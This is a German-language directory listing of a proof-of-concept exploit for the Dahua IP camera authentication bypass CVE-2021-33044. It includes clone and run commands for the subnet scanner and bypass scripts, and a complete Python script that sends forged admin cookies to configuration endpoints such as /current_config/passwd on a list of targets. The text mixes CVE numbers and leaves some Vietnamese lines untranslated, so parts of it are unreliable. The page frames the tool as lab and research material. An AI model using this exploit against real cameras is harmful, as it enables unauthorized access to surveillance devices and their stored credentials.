Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
DAHUA_AUTH-BYPASS-CVE-2021-33044 — PoC-Exploit für die Umgehung der Dahua-Authentifizierung (CVE-2021-33044). Scannt Subnetze, testet mehrere CVEs und extrahiert Gerätekonfigurationen über manipulierte Cookies ohne gültige Anmeldedaten. | Kitploit
Tools/GitHubGitHub/eagle-nett/dahua_auth-bypass-cve-2021-33044
Authentifizierung & AutorisierungIoT-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubeagle-nett/dahua_auth-bypass-cve-2021-33044

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

DAHUA_AUTH-BYPASS-CVE-2021-33044

PoC-Exploit für die Umgehung der Dahua-Authentifizierung (CVE-2021-33044). Scannt Subnetze, testet mehrere CVEs und extrahiert Gerätekonfigurationen über manipulierte Cookies ohne gültige Anmeldedaten.

Repository anzeigen
17vor 5 MonatenNoch nicht geprüft

Simulation des Dahua Authentication-Bypass-PoC (CVE-2021-33044)

Übersicht

Dahua-IP-Kameras sind IoT-Geräte, die häufig in Sicherheitsüberwachungssystemen eingesetzt werden. Da sie oft in internen Netzwerken oder über das Internet erreichbar sind, können Sicherheitslücken bei IP-Kameras schwerwiegende Auswirkungen auf die Privatsphäre und die Informationssicherheit haben.

CVE-2021-33045 ist eine Sicherheitslücke, die in einigen Dahua-Kameramodellen existiert und unbefugten Zugriff auf interne Konfigurationsressourcen ohne gültige Authentifizierung ermöglicht. Diese Schwachstelle resultiert aus einer unzureichenden Zugriffskontrolle in der Firmware des Geräts.

Informationen zur Schwachstelle

FeldInhalt
CVECVE-2021-33044
TypAuthentication Bypass
SchweregradCritical (CVSS ~9.8)
AuthKeine Authentifizierung erforderlich
BetroffenDahua Camera / DVR / NVR

Ursache

Die Schwachstelle resultiert aus einem unsicheren Authentifizierungsdesign in der Firmware der Dahua-Kameras:

  • Der Server prüft Session/Token nicht korrekt
  • Vertrauen auf vom Client gesendete Daten
  • Einige sensible Konfigurations-Endpoints prüfen nur die Existenz von Cookies, nicht die tatsächlichen Zugriffsrechte

Dies ermöglicht Angreifern:

  • den Authentifizierungsprozess zu fälschen
  • den Login vollständig zu umgehen

Referenzen:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

Funktionsweise des Authentifizierungs-Bypass-Mechanismus

Normaler Ablauf

root@kitploit:~
→ Client gửi HTTP request kèm cookie tùy ý
→ Camera kiểm tra cookie ở mức giao diện
→ Không xác minh session hợp lệ ở backend
→ Cho phép truy cập trực tiếp vào các endpoint cấu hình nội bộ
→ Trả về dữ liệu nhạy cảm

Skripte

Verwendung

Installation

root@kitploit:~
# Clone repository
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

Netzwerk-Scan

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py https://example.com -p 80 8080 8800

# Single host with port
python dahua_scanner.py https://example.com

Gängige Dahua-Ports: 80,443, 8080, 37777, 37778

Ausnutzen der CVE-Sicherheitslücke

root@kitploit:~
python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

Authentifizierung umgehen

root@kitploit:~
python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # Dump thiết bị sau khi bypass

Beispiel

root@kitploit:~
#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

Erläuterung

  • Das Skript verwendet die Bibliothek requests und deaktiviert aktiv SSL-Warnungen.

  • Die Funktion dump_accounts(ip, port=80) ist die Hauptfunktion, die für die Prüfung eines Kamerageräts zuständig ist. Ihre Hauptfunktionen sind:

    • Die URL aus IP-Adresse und Port erstellen
    • Den Admin-Login-Status über Cookies simulieren
    • Anfragen an sensible Konfigurations-Endpoints senden
    • Die Antworten analysieren, um festzustellen, ob das Gerät betroffen ist
  • Simulation von Authentifizierungs-Cookies. Die Funktion verwendet Cookie-Werte wie:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • In betroffenen Kameraversionen überprüft das Backend die tatsächliche sessionID nicht, sodass das System davon ausgeht, dass die Anfrage von einem gültigen Administratorkonto stammt.

Verarbeitungsschleife für die Zielliste

Das Skript liest die Zielliste aus der Eingabedatei und ruft nacheinander die Prüffunktion für jedes Gerät auf. Dieser Ansatz ermöglicht die automatische Bewertung mehrerer Kameras.

image

Entwicklungsprozess

Diese Skripte wurden auf Basis folgender Quellen entwickelt:

  • Von NVD veröffentlichte CVE-Details
  • Sicherheitshinweise von Dahua
  • Öffentliche PoC-Referenzen (seclists.org, packetstormsecurity)

Teststatus:

  • Die Authentifizierungs-Bypass-Logik wurde gemäß den CVE-Spezifikationen implementiert
  • Begrenzte Tests auf anfälligen Geräten.

Hinweis

Dieses Projekt:

  • Dient nur zu Lern- und Forschungszwecken
  • Bitte nur in einer persönlichen Laborumgebung ausführen
Tool herunterladen
DateiZweckCVEs
dahua_scanner.pyNetzwerk-Entdeckung – findet Dahua-Kameras im SubnetzErkennung
dahua_exploit.pyMulti-CVE-Scan-Tool – prüft alle Sicherheitslücken.Alle
dahua_auth_bypass.pyDedizierter Authentifizierungs-Bypass mit --dump-OptionCVE-2021-33044